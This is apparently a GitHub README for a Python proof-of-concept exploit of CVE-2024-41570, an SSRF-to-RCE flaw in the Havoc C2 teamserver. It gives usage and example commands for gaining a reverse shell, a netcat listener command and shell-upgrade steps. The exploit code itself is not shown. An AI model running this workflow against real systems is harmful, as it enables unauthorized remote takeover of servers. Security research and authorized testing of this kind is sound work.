Automated Reverse Shell Exploit via WebSocket | Havoc-C2-SSRF with RCE

kit4py/CVE-2024-41570

CVE-2024-41570 | Havoc C2 SSRF with RCE | Automated Reverse Shell Exploit via WebSocket

This project provides a Python-based proof-of-concept (PoC) script to exploit a vulnerable WebSocket-based service. The script automates agent registration, WebSocket payload delivery, and remote command execution to establish a reverse shell.

Features

  • Registers an agent to the target service.
  • Opens a WebSocket and sends handshake and authentication payloads.
  • Executes commands remotely via a reverse shell.
  • Provides a guided workflow with clear instructions.

Prerequisites

  • Python 3.x installed on your machine.
  • Install required dependencies by running:
    pip install -r requirements.txt

Installation

  1. Clone this repository:
    git clone https://github.com/<your-repo-name>.git
  2. Navigate to the project directory:
    cd CVE-2024-41570
  3. Install dependencies:
    pip install -r requirements.txt

Usage

Run the script with the required arguments:

python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>

Arguments

  • -t: Target URL of the WebSocket server.
  • -i: IP address of the Havoc Team Server.
  • -p: Port of the Havoc Team Server.
  • -U: Username for WebSocket authentication.
  • -P: Password for WebSocket authentication.
  • -l: Listener IP for the reverse shell (your machine).
  • -L: Listener port for the reverse shell (your machine).

Example Command

python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444

Steps to Execute

  1. Ensure the target service is running and vulnerable.
  2. Run the script with the required parameters.
  3. In a separate terminal, start a listener:
    nc -lvnp <listener_port>
  4. Upgrade shell:
    python -c 'import pty; pty.spawn("/bin/bash")'
    export TERM=xterm-256color
    stty rows 67 columns 318

Dependencies

The script requires the following Python libraries:

  • requests
  • pycryptodome

Install them using the command:

pip install -r requirements.txt

Security Notice

This script is intended for educational purposes only. Ensure you have explicit authorization to test the target system. Misuse of this script may violate laws and ethical guidelines.

References

Inspired by Default Havoc PoC

Contributing

Contributions are welcome! Feel free to fork the repository and submit a pull request.

License

This project is licensed under the MIT License. See the LICENSE file for details.
